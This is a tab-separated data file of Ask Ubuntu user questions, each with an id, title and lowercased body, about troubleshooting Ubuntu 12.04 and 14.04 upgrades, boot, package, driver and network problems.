511819	increase size of root / ubuntu 14.04	i wanted to increase the size of my root / and /home in ubuntu . currently my disk map looks like following : filesystem size used avail use % mounted on /dev/sda9 14g 9.2g 3.8g 71 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 788m 1.4m 786m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 224k 3.9g 1 % /run/shm none 100m 44k 100m 1 % /run/user /dev/sda11 13g 7.1g 4.6g 61 % /home /dev/sda8 268m 145m 105m 59 % /boot /dev/sda2 296m 48m 249m 16 % /boot/efi the output from sudo parted -l is as follows : model : ata st1000lm024 hn-m ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 525mb 524mb ntfs basic data partition hidden , diag 2 525mb 840mb 315mb fat32 efi system partition boot 3 840mb 974mb 134mb microsoft reserved partition msftres 4 974mb 938gb 937gb ntfs basic data partition msftdata 8 938gb 938gb 299mb ext4 9 938gb 953gb 15.0gb ext4 10 953gb 961gb 8000mb linux-swap ( v1 ) 11 961gb 974gb 13.4gb ext4 5 974gb 975gb 366mb ntfs hidden , diag 6 975gb 999gb 24.5gb ntfs basic data partition hidden , diag 7 999gb 1000gb 1074mb fat32 basic data partition hidden , diag i have searched for some threads and came across the this thread resizeandduplicatewubidisk . my laptop has both windows 8 and ubuntu 14.04 lts running . however i remember i could n't use wubi to install ubuntu since i had windows 8 and had to change uefi settings to install ubuntu . i am not sure if the above mentioned automated script in the thread or doing it manually will work for me as i dont think i have the root.disk file which i think maybe generated when you use the wubi installer . if i do have the root.disk file where can i locate this file in windows 8 and how ? i am not 100 % sure on this . i was wondering if someone can point me to a direction in which i can allocate more space to my / and /home file systems without doing a complete re install .
511822	jerks and involuntary scrolling windows and menus	new update to 14.04 from new install of 12.04 ... debian partition continues to work properly . on various programs , if there 's a window large enough to scroll -- or a menu or slider i 've focused on -- the menu will generally twitch when i try to use it , a slider will move if the mouse is even close , the window will scroll -- usually too fast to click on anything in there . this morning , starting again , no problem at first . tried to report problem here , found the page suddenly starting to scroll out of reach as i typed , so that i could n't complete the report ( have now come here from the debian partition . )
511823	err http : //mirror.rackspace.com/ubuntu/ unable to fetch some archives	ubuntu 12.04.4 lts server on rackspace after apt-get update , i ran the upgrade and got this : # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-headers-virtual linux-image-virtual the following packages will be upgraded : apparmor base-files dh-apparmor dmidecode grub-common grub-pc grub-pc-bin grub2-common icedtea-6-jre-cacao icedtea-6-jre-jamvm krb5-locales krb5-multidev libc-bin libc-dev-bin libc6 libc6-dev libgssapi-krb5-2 libgssrpc4 libk5crypto3 libkadm5clnt-mit8 libkadm5srv-mit8 libkdb5-6 libkrb5-3 libkrb5support0 libparted0debian1 libssl-dev libssl-doc libssl1.0.0 libsvn1 multiarch-support nodejs nodejs-dev openjdk-6-jdk openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib openssl parted postgresql-9.1 postgresql-client-9.1 postgresql-contrib-9.1 rackspace-monitoring-agent subversion update-manager-core 44 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . need to get 1,118 kb/90.5 mb of archives . after this operation , 262 kb disk space will be freed . do you want to continue [ y/n ] ? y err http : //mirror.rackspace.com/ubuntu/ precise-security/main subversion amd64 1.6.17dfsg-3ubuntu3.4 404 not found err http : //mirror.rackspace.com/ubuntu/ precise-security/main libsvn1 amd64 1.6.17dfsg-3ubuntu3.4 404 not found failed to fetch http : //mirror.rackspace.com/ubuntu/pool/main/s/subversion/subversion_1.6.17dfsg-3ubuntu3.4_amd64.deb 404 not found failed to fetch http : //mirror.rackspace.com/ubuntu/pool/main/s/subversion/libsvn1_1.6.17dfsg-3ubuntu3.4_amd64.deb 404 not found e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i am have tried apt-get update -- fix-missing but that does n't help . not sure how to go forward .
511826	how do i record with vokoscreen ? it wo n't start . ( 14.04.1 )	i installed it , everything works except when i start recording . the problem is ... it wo n't even start . webcam works , timer till it starts work , but it wo n't start . the screen blinks white , but it wo n't start . i can keep on clicking start , the timer count down to 0 , but it wo n't start . can anybody help me ?
511829	exit full screen of gnome terminal	accidently , i full-screen display the gnome terminal . i now ca n't get out of the full screen display back to normal display . so i wonder how i can get out of the full screen display back to normal display ? my ubuntu is 12.04 . thanks !
511831	chrome not starting after upgrade	i upgraded from 12.04 to 14.04 on one laptop . everything went mostly well except chrome would n't start . i downloaded it from google and reinstalled and now it 's fine . i upgrade a pc from 12.04 to 14.04 . same issue , chrome does not start . i tried same tactic but it wont let me install because there is some hangup with libreoffice base . it will not install upgrade and because of this it 's blocking google chrome install and removal . i went into synaptic package manager and tried to uncheck libreoffice-base so it will not do anything with it but it will not uncheck , will not uninstal etc . is there any way to bypass or eliminate the base issue so i can proceed with chrome ? this is what i get when trying to reinstall chrome via software center ... ..installarchives ( ) failed : selecting previously unselected package libreoffice-base . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 185667 files and directories currently installed . ) preparing to unpack ... /libreoffice-base_1 % 3a4.3.0-0ubuntu1~trusty1_i386.deb ... unpacking libreoffice-base ( 1:4.3.0-0ubuntu1~trusty1 ) over ( 1:4.3.0-0ubuntu1~precise1 ) ... /var/lib/dpkg/info/libreoffice-base.postrm : 31 : /var/lib/dpkg/info/libreoffice-base.postrm : syntax error : end of file unexpected ( expecting `` fi '' ) dpkg : warning : subprocess old post-removal script returned error exit status 2 dpkg : trying script from the new package instead ... /var/lib/dpkg/tmp.ci/postrm : 28 : /var/lib/dpkg/tmp.ci/postrm : syntax error : end of file unexpected ( expecting `` fi '' ) dpkg : error processing archive /var/cache/apt/archives/libreoffice-base_1 % 3a4.3.0-0ubuntu1~trusty1_i386.deb ( -- unpack ) : subprocess new post-removal script returned error exit status 2 leaving 'diversion of /usr/lib/libreoffice/share/basic/dialog.xlc to /usr/lib/libreoffice/share/basic/dialog.xlc.noaccess by libreoffice-base' leaving 'diversion of /usr/lib/libreoffice/share/basic/script.xlc to /usr/lib/libreoffice/share/basic/script.xlc.noaccess by libreoffice-base' /var/lib/dpkg/tmp.ci/postrm : 28 : /var/lib/dpkg/tmp.ci/postrm : syntax error : end of file unexpected ( expecting `` fi '' ) dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 2 processing triggers for mime-support ( 3.54ubuntu1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for menu ( 2.1.46ubuntu1 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... error in function :
511832	why the pppoe connection accept any `` password ? ''	i found the pppoe connection connected successfully for any `` password '' i typed and wo n't ask again even if i did n't saved it unless i deleted the content of the password field . what 's the problem and how to solve it ? thanks .
511833	ca n't ssh in as root	i 'm using the default installation of openssh-server for my ubuntu 14.04 server . i can connect through the console as root like normal , with my username and password . when i try to ssh with the same username/password , however , i repeatedly get access denied errors . /var/log/auth.log reports failed password for root from < ip address > port < port > ssh2 , but i 'm entering the correct password . why ca n't i connect to the server via ssh , even though the username and password are correct ?
511835	an overlooked feature missing - dvd as file storage media	i 'm running v14 and i can not read any of the dvds i have stored backup files for my novels and short stories . v14 does n't recognize the fact that a dvd contains data instead of a movie or is some kind of installation media . these backup dvds are recognized under osx and windows . am i missing a library that i do n't know about ? thanks ... wm hayashi
511837	sdk freezes when idle for 2 min	when i let the sdk sit open for about 2 minutes it starts freezing and i ca n't do any editing to the source unless i expand or minimize the app . i 'm not sure on how to fix this . i 'm using ubuntu 14.04 .
511838	lubuntu 14.04 lts upgrade question ( grub )	background i have a headless lubuntu system and have no possibility to add a monitor ( believe me i have tried ) . when this has gone down in the past ( only once ) i have had to take the primary disk out of the machine and attach to my laptop . i then use the external drive as a primary drive to vbox and build ubuntu and then when ssh is installed pop the drive back into my nas server and add the other disks to the machine . this is a pain problem last night i ran an upgrade command as there were a number of updates available and this took a good 10 minutes , much longer than usual . i then was told via ssh that grub could not be found and where would i like to install grub . i put it back where it should be on sda . everything seemed to finish ok and the machine is available on the network . however i am worried that when i reboot i may get questions from grub . if i get a question from grub on boot then i can not answer and will need to take out the disk and possibly rebuild or try to fix . thats going to be tough . question is there anything that i can do to ensure that grub will just boot and not ask any questions that require a user response ? i did run a sudo update-grub command after all of this many thanks for any help . am currently very wiered out about rebooting cheers
511840	cordova / npm problem in sockets connection ubuntu 14.04	i am facing a problem while using cordova , every time cordova/npm needs to access web resources , like add a android platform . i have the android sdk up and running . and using ubuntu 14.04 . when i first tried to create a cordova app , the connection problem appeared for the first time . it was some problem related to the proxy configuration . i set the new config for npm , and than the 'cordova create ' command worked just fine . here is what i did : ~ $ npm config set `` proxy '' `` '' ~ $ npm config set `` https-proxy '' `` http : // '' i thought i would not see this issue again , but ... when i tried to add android platform for the project : cordova platforms add android as response i got : > downloading cordova library for android ... unable to fetch platform android : error : tunneling socket could not be established , cause=socket hang up i 've tried to change the proxy config to `` http : //192.168.0.1:80 '' , as well for https-proxy ... but no success . my global proxy configurations are correct defined , but still , cordova ca n't reach the servers to install android platform . i am stuck in here . thanks for any help !
511841	can not compile character driver	i am using linux-3.10.48 kernel version , i tried a character driver code which would return the major number for the driver and would register the same . but , the main problem is in the cleanup module , where i am trying to unregister the driver . i commented the the exit module in order to get the code compiled and executed . it is properly returning the major number associated with the driver . the major number 251 , which i am passing to the cleaunup module is the one i got to know after executing the code without cleanup module . would anyone help me in figuring out any mistake in the exit module ? following is the code for init and cleanup modules . plus , i am new to kernel module programming . the code is follows : int init_module ( void ) { major = register_chrdev ( 0 , device_name , & fops ) ; if ( major < 0 ) { printk ( kern_alert `` registering char device failed with % d\n '' , major ) ; return major ; } printk ( kern_info `` i was assigned major number % d . to talk to\n '' , major ) ; printk ( kern_info `` the driver , create a dev file with\n '' ) ; printk ( kern_info `` 'mknod /dev/ % s c % d 0'.\n '' , device_name , major ) ; printk ( kern_info `` try various minor numbers . try to cat and echo to\n '' ) ; printk ( kern_info `` the device file.\n '' ) ; printk ( kern_info `` remove the device file and module when done.\n '' ) ; return success ; } /* * this function is called when the module is unloaded */ void cleanup_module ( void ) { int ret = unregister_chrdev ( 251 , `` chardev '' ) ; if ( ret < 0 ) printk ( kern_alert `` error in unregister_chrdev : % d\n '' , ret ) ; }
511842	cursor wo n't change in ubuntu 14.04	i know there was an old bug back during ubuntu 9.x where the cursor would n't change because of compiz . i am now running ubuntu 14.04 and the bug has now decided to rear its ugly head again . i am using an old cursor that looked decent with a theme and i now switched themes and my current cursor does n't look good with it . i tried changing it with unity tweak tool but when i apply the cursor , it wo n't change but it will use them in certain programs such as firefox . is there a way to fix this ?
511843	what should i do to avoid my roommate from changing my password through using system recovery mode . ?	he did this last time when i left my laptop at room . opened the system recovery mode from advanced ubuntu options and changed the password using 'passwd usrname ' command.is there anything i can do for this to not happen in future .
511845	external hard disc problems - not showing in ubuntu	i have a hdd fitted in an enclosure which provides power to it . the hdd is plugged into a usb socket . if i press esc during boot the hdd shows in the list ( the hdd is blank and has not been formatted ) . this external hdd does not show in ubuntu so i ca n't do anything with it . i have tried disconnecting the external hdd switching it on and off and then reconnecting to usb ( no sign of anything )
511848	ca n't open java mind-mapping create from freeplane	i 've created mindmap in freeplane and then export it as `` java '' , that gave me a html file and a folder . when i open this html file in windows it works correctly in google chrome and firefox . but opening it in ubuntu , it 's not working . in firefox , ff asked me to allow icedtea plugin but even i allow it , it always cause my computer to crashed in chrome , it always redirects me to java download page what should i do ? i saw some advice about running applet in `` appletviewer '' but i do n't know how to install `` appletviewer '' , either
511849	listing an empty folder shows two items . and .. , what are they ?	algosig @ algosig : ~ $ mkdir test algosig @ algosig : ~ $ cd test > algosig @ algosig : ~/test $ ls -all total 8 > drwxrwxr-x 2 algosig algosig 4096 august 15 23:09. drwxr-xr-x 41 algosig algosig 4096 august 15 23:09. what are single point . and double point .. ? and what is the meaning of total 8
511853	e : unable to lock the administration directory , is another process using it ?	i am new to linux . i had recently installed ubuntu 14.04 . after the installation to get up to speed with all the packages , i tried to sudo apt-get update but it does n't run and gives this error : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
511854	just upgraded to 14.04 trusty . can not get back into the session . issue with install ?	i am sorry , but i am new to linux . i have an extra samsung xe303c12-a01us chromebook lying around and i thought it would make an ok candidate to install gnuradio on for some rtlsdr work . after following this guide : http : //www.cnet.com/how-to/how-to-run-both-chrome-os-and-ubuntu-on-a-chromebook/ i had a successful version of 12.04 ( precise ) working on it . i was told that to better utilize gnuradio , i best upgrade to 14.04 ( trusty ) which i did this morning . unfortunately , my battery ran out and the computer shut down . upon trying to type `` startxfce4 '' or `` sudo startxfce4 '' i am met with `` command can not be found '' as it seems i can not log back into the linux session . am i missing something , or is this something i might need to reinstall ? thanks !
511857	grub rescue after upgrading from 12.04 to 14.04	current status : can not boot from hd at all ( dualboot with win7 ) can not boot from usb either ( 12.04 and win7 ) , goes to boot : prompt , do not know what to do here , wants a kernel name , same for both ubuntu 12 and win7 usb drives . at grub rescue prompt : grub rescue > ls ( hd0 ) ( hd0 , msdos5 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) grub rescue > ls ( hd0 , msdos5 ) /boot/grub/i386-pc bunch of mod files grub rescue > set prefix= ( hd0 , msdos5 ) /boot/grub/i386-pc grub rescue > set root= ( hd0 , msdos5 ) / grub rescue > insmod normal error : symbol not found : 'grub_divmod64 ' . grub rescue > insmod linux error : symbol not found : 'grub_realidt ' . these errors were not part of the instructions i found while googling and googling the errors have not led to solutions . i 'm pretty novice with ubuntu/linux/unix . i 'm guessing the mbr is messed up or boot.ini is missing or i dunno .
511858	.sh file on startup applications is n't executed	this is a followup to a question about dialog boxes . i want to show a dialog box both at the start of a session , and after n minutes of inactivity . i have decided to use zenity and xautolock . i have success invoking both from the command line ( bash ) . zenity -- text=text -- warning xautolock -time 15 -locker `` zenity -- text=sometext -- warning '' however , there are some constraints : the text has multiple words . if it has spaces , zenity will only show the first word and try to parse the other words as parameters . to fix this , i enclose the text in double quotes ( `` ) , but it leads to : xautolock takes the entire zenity command as an option for its -locker parameter . the command has multiple words , so i have to enclose it in quotes . but it already had quotes originally , so it conflicts on quotes-inside-quotes . i want the alert text to be customizable , so i 'm using -- text= '' $ ( cat .filename ) '' . so now what i have is : zenity -- text= '' $ ( cat .filename ) '' -- warning xautolock -time 15 -locker `` zenity -- text=\ '' $ ( cat .filename ) \ '' -- warning '' if i run each line separately on a terminal session ( bash ) , they do work . the cursor gets stalled waiting for the process to terminate , but the dialog boxes are displayed the way i need them . now i need it to start automatically with no user intervention . what i did : i 've put each line separetedly on the startup applications list . instead of showing the desired text , they will show $ ( cat on the dialog box . i created a command.sh file on my ~ folder , pasted these two lines , made it executable . running the script from the command line works . puting ~/command.sh as an entry on startup applications does not work . nothing happens , nothing is displayed , no error message , nothing . according to this answer , it should work . putting /home/username/command.sh does work , but this user is just a `` skel '' that gets copied to a guest user folder created upon login , so the username folder will be `` guest-randomstring '' , and i ca n't set is as a startup applications entry . for permission reasons , i ca n't set in to the `` skel '' user as well .
511859	error when trying to install ubuntu desktop	i burnt the iso ( 64bit version ) to a disk and attempted to install it on my pc ( with win7 already installed on it ) . when i selected the option to `` erase disk and install ubuntu '' , it gives me an error that i 'm not able to click out of . it goes to the next section ( `` where are you '' ? ) but i 'm not able to do anything cause of the error . the error is : `` ? ? ? ? ? ? '' as the title . and the info box `` ? ? ? ? ? ? '' . really descriptive huh ? i tried burning another disk ( thinking it was screwy ) and i got the same thing . i really do n't want windows on this pc , wanting it to just be a linux box . any ideas on what to do ? thank you ! some other notes i should add.. i have more than enough space on my hdd , and i 'm connected hard wired for ethernet .
511860	internet conection problem when updating ubuntu 12.04 to 14.04 server	upgraded my server 's software from ubuntu 12.04 to ubuntu 14.04 and now the server can not access the internet . i can ping devices on my lan , including my modem . when i try to ping any site on the internet ( 8.8.8.8 for example ) , i get 100 % packet loss . i feel like this may be a dns issue from what i 've been reading . i 've added the following line to /etc/network/interfaces : dns-nameservers 8.8.8.8 8.8.4.4 with no success . relevant outupt of ifconfig : eth0 link encap : ethernet hwaddr 64:31:50:1f:88:72 inet addr:192.168.0.222 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :6631:50ff : fe1f:8872/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:575229 errors:0 dropped:55 overruns:0 frame:0 tx packets:10313 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:35490659 ( 35.4 mb ) tx bytes:898607 ( 898.6 kb ) output of route -n : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 /etc/network/interfaces : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.0.222 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.1 dns-nameservers 8.8.8.8 8.8.4.4 output of tracepath 8.8.8.8 : 1 ? : [ localhost ] pmtu 1500 1 : 192.168.0.1 0.446ms 1 : 192.168.0.1 0.444ms 2 : no reply 3 : no reply //continues with no reply until interrupted
511862	an ubuntu/linux alternative of bulk rename utility for windows ?	i have only spent 5 months with ubuntu and it has been an awesome experience , i hardly boot into windows now , but there are some things i miss , like the bulk rename utility i used to have in windows . i use the program a lot when i boot into windows but i 'd prefer if there was an alternative or something similar cause the program had a plethora of renaming options with a decent gui . i 'm aware of the rename command in terminal , but i 've never had any luck with it . a screenshot of what it looks like : questions is there an alternative of this program for ubuntu ? a great command line resource on how to get this done without a gui ?
511868	upgrade to14.04 lts caused win 7 and dual boot to not work	i upgraded from 12.04 lts to 14.04 ; it ended up breaking my dual boot . long story short ; i did a restore/recovery of win7 . now i have no dual boot , just win7 . assuming 14.04 lts is intact `` hiding '' on disk ; how can i get it back and , get the dual boot working ?
511870	how to scroll down vboxmanage output ?	when i type the vboxmanage command i get a sort of manpage output , where it shows all the information at once . how can i view the info incrementally like less/more commands with files ?
511874	while trying to change permisions on /etc , i accidentally corrupted the whole file .	while using the command chmod to adjust the permissions , i somehow corrupted the entire /etc file . all the files in it are now unreadable , making it impossible to access sudo or ssh .
511875	how to install xnviewmp in ubuntu 14.04 ?	i 'm trying to install xnview multi platform on my kubuntu 14.04 . it is available in the ubuntu apps directory ( see here ) but apturl - as well as apt-get install xnviewmp - gives the error unable to find the package . ca n't figure out what went wrong ! any ideas ? distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty sources.list file : http : //pastebin.com/ezbbta7m
511876	how to install a fingerprint reader on lenovo thinkpad with ubuntu 14.04	i have a lenovo-thinkpad which came with a fingerprint reader , i 'm using ubuntu 14.04 and i have no idea how to enable it . i already tried : sudo add-apt-repository ppa : fingerprint/fingerprint-gui sudo apt-get update but this gui did not recognizes my device . does anyone knows any other option ?
511878	how to add another ubuntu version to `` affects '' list on launchpad bug ?	i experience that bug on precise : https : //bugs.launchpad.net/ubuntu/+source/sysvinit/+bug/1212142 so far it has been reported that it affects saucy . i want to add precise to `` affects '' list . how to do that ?
511880	upgrade to 14.04 lts on vmware leads to blank screen	okay , so i 've done all the unity stuff . i 've installed ccsm . i 've checked unity enablement . i 've deleted configs etc . in short i 've done everything i 've found on the internet . i 've even installed gnome but none of the gnome options on login do anything different . i 'm suspicious that this is related to the vmware graphics drivers but unless i can get a graphical login i do n't seem to be able to get access to the tools . anyone figured a way out of this ?
511887	how to check if i can connect to a server port ?	i have a riseup account , but i just ca n't get the smtp to work . i have tried all the tutorials , nothing . neither thunderbird nor sylpheed work . then i thought that my isp might be blocking the ports or whatever , so i wanted to check that . only i do n't know any ( command-line ) way to do it . something like internety-sounding-thing mail.riseup.net:465 . anyone ?
511888	mount : permission deined - ispconfig 3	iâm currently trying to install ispconfig while running `` mount -o remount / '' it said `` mount : permission deined '' . my fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/belzar-root / ext4 errors=remount-ro , usrjquota=quota.user , grpjquota=quota.group , jqfmt=vfsv0 0 1 # /boot was on /dev/sda1 during installation uuid=46d1bd79-d761-4b23-80b8-ad20cb18e049 /boot ext2 defaults 0 2 /dev/mapper/belzar-swap_1 none swap sw 0 0 /dev/sr0 /media/cdrom0 udf , iso9660 user , noauto 0 0 proc /proc proc defaults 0 0 none /dev/pts devpts rw , gid=5 , mode=620 0 0 none /run/shm tmpfs defaults 0 0 here is link on tutorial ( 14 install pureftpd and quota ) .
511889	`` unmet dependencies '' when trying to install vlc ( via software center )	i am trying to install vlc media player ( ubuntu 14.04 ) , but when i write in terminal `` sudo apt-get install vlc '' , or trying to install via software center , this is what i get : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.1.4-0ubuntu14.04.1 ) but 2.1.4-0ubuntu14.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.19-0ubuntu6.1 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.5.2-1ubuntu2.2 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.8.2-19ubuntu1 is to be installed depends : zlib1g ( > = 1:1.2.3.3 ) but 1:1.2.8.dfsg-1ubuntu1 is to be installed how do i solve this ? thanks for answering !
511892	winbind not working after upgrading to 14.04 ( from 12.04lts )	winbind stopped working after i upgraded to ubuntu 14.04 ( from 12.04 following the automatic upgrade prompt ) . this is on a home lan with my router providing dynamic ip addresses to my machines . specifically mount does not recognize my network file server by name , and requires the ip address . also i noticed my dhclient.conf file is empty . is this how it should be ?
511893	how to fix `` ( initramfs ) unable to find a medium containing a live file system '' on custom live usb ?	i 've noticed that a lot of people have asked this before , but no method that i 've found seemed to work , so i apologize in advance . i 've created a custom live usb using the ubuntu customization kit and a stock image of ubuntu desktop 14.04 64-bit . the reason for creating the custom image is because i would like a lot of the tools that i use regularly ( qt , adt , build-essential , etc ) to already be available instead of having to download 1gb+ every time i 'm somewhere without my regular machine . i 'm using yumi 2.0.0.2 to create by bootable usb flash drive , which works great for the stock image . whenever i try to load any customized iso via usb generated by uck , it gives the error message : ( initramfs ) unable to find a medium containing a live file system however , when i burn the iso to a dvd , it boots without a problem . i 've edited the isolinux.cfg to put 'vmlinuz.efi ' at the end of live-media-path , thinking that might be it . i 've tried to find information about where ubuntu looks for the uuid of the device , only found it in the 'casper-uuid-generic ' file . anyone have any ideas ? thanks for any help !
511897	switching language with alt key in 12.04	whenever i needed to switch the languages in my keyboard it interfered with the alt key that was meant for hud search . so i changed the shortcut in the settings , now i can use another key for hud . but the problem is that the key i used for switching the language does not function now . i am assuming this key is alt key on the right side even though it does n't say alt in my keyboard layout . ( it says ko/en in korean , and i do n't know the name of this key . ) what should i do to make the language switch key work ? p.s i do n't know if it is related to the problem , but in my linux settings when i click alt key or ko/en key to change the shortcut , it does not put the result in the screen . it shows no change .
511901	firefox crashing	since i upgraded to 14.04 lts my firefox crashes every few minutes . i asked this question before and there has been not response . i can not get into my yahoo account . what can i do to resolve this ?
511903	skype video freeze	ubuntu 12.04 been skype ( ing ) with skype version 4.2something and its been fine , had an an email from skype saying that i needed to update to new version skype-ubuntu-precise_4.3.0.37-1_i386.deb if i wished to continue logging into skype . since installing the upgrade on my pc the video of me on the remote pc freezes after about 5seconds and stays frozen until switching the video off and on my end , it will animate for again 5ish seconds before freezing again , this did not happen while i was using the 4.2 version . i cant find a 4.2 version to revert back to and the one in the software centre appears to be an old beta too old to work . the only adjustment i can find for skype video is check or uncheck auto exposure which makes no difference to the freezing . at my end there seems no perceptible difference between versions , its ok but the video freezing on the remote pc is a consequence of my version upgrade . grateful for any suggestions of a fix
511908	i have installed the latest nvidia drivers from nvidia.com however display is corrupted	ubuntu 14.04.1 lts i have installed nvidia-linux-x86_64-340.32 using the installer from nvidia i achieved this by disabling nouveau . when x starts it is in low resolution and is corrupted . when running the nvidia x server settings tool i get an error dialogue with `` you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run 'nvidia-xconfig ' as root ) , and restart the x server '' now , i 'm pretty certain that it is installed ... see below . sudo lshw -c display *-display description : vga compatible controller product : gf104 [ geforce gtx 460 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : f8000000-f9ffffff memory : d0000000-d7ffffff memory : dc000000-dfffffff ioport : ac00 ( size=128 ) memory : d8000000-d807ffff lspci -vnn | grep -i vga -a 12 02:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf104 [ geforce gtx 460 ] [ 10de:0e22 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : micro-star international co. , ltd. [ msi ] n460gtx cyclone 1gd5/oc [ 1462:2322 ] flags : bus master , fast devsel , latency 0 , irq 16 memory at f8000000 ( 32-bit , non-prefetchable ) [ size=32m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=128m ] memory at dc000000 ( 64-bit , prefetchable ) [ size=64m ] i/o ports at ac00 [ size=128 ] [ virtual ] expansion rom at d8000000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nvidia so i am at a loss as to why my display is b0rked . please help
511909	skype and 14.04 , get to the main window directly	i just upgraded to ubuntu 14.04 lts , and i 'm currently going through all the things the upgrade messed up ( themes , icons , menus , ... ) . one of the last things i 'd like to fix is the skype icon behaviour in the unity panel bar . the icon does show correctly , that problem was among my previous fixes . thing is , back on ubuntu 12.04 , clicking on the skype icon brought the contact list ( main window ) to the screen directly . now , when i click the icon , i get the old menu ( screenshot below ) , and i need to click activate to get the main window . ( since the menu automatically closes when screenshooting , i took another image , probably from an older version ) i know this is a ridiculous detail , but it bothers me anyway . is it possible to restore the previous behaviour of the icon in order to get skype 's main window to open without needing to click activate ? ideally , i 'd like to : left-click on the icon to pop the skype window . right-click on the icon to pop the menu .
511910	*check for updates* in monodevelop	what happens i click check for updates in monodevelop ? : there no message nor any kind of information when i click it . probably it works only in windows version ?
511913	just upgraded to 14.04 and my super key does n't work and i ca n't find the dash either	i have been using an old version of ubuntu and then skype stopped working an i was told i would need to upgrade . so now i have had the experience of upgrading to this new version 14.04 and skype works again but sadly the super key does n't work , i have no side bar , i ca n't find the dash , google chrome does n't work and my mouse pad scroll does n't either ( not that the this really matters to me ) .
511916	only one display works on geforce 770 in ubuntu 14.04 lts	i have three monitors in my system - all three are dell e2014h 19 '' displays . one monitor is connected to a geforce 550ti , and the other two are connected to a geforce 770 , all via dvi . after installing ubuntu ( fresh install ) , the monitor on the 550 works as expected . one monitor on the 770 works , but the other has no signal . in display settings , all three monitors are shown , however the third monitor is switched to `` off '' . switching it `` on '' and hitting apply brings up a generic `` the settings could not be applied '' message , and the display remains off . in nvidia x server settings , all three displays are listed , and have identical information . the above has all been with both graphics cards using the nouveau display driver . when i switched both cards to the nvidia binary driver ( 331.38 from nvidia-331 ) , the 550 remains functional . the 770 is listed in the nvidia x server settings panel , however the two displays on it are not listed in display settings , and the 770 has disappeared from the `` additional drivers '' panel . any ideas ? this is on a fresh , brand-new install ; i have n't even gotten around to putting my commonly used stuff on it yet . p.s . - during the install process , the same behavior was observed - the 550 was functional , but only one screen on the 770 was on . edit : when using the xorg drivers , the error `` could not switch the monitor configuration : could not set the configuration for crtc 64 '' appears on boot , and when attempting to enable the third display .
511917	today 's update ( 8/15/2014 ) for 14.04 disabled my touchpad on acer c720 laptop	as the title says , today i updated ubuntu 14.04 on my laptop which is acer c720 and then the touch pad stopped working after restart . does anybody know what steps i should take to resolve this ? thanks for your help .
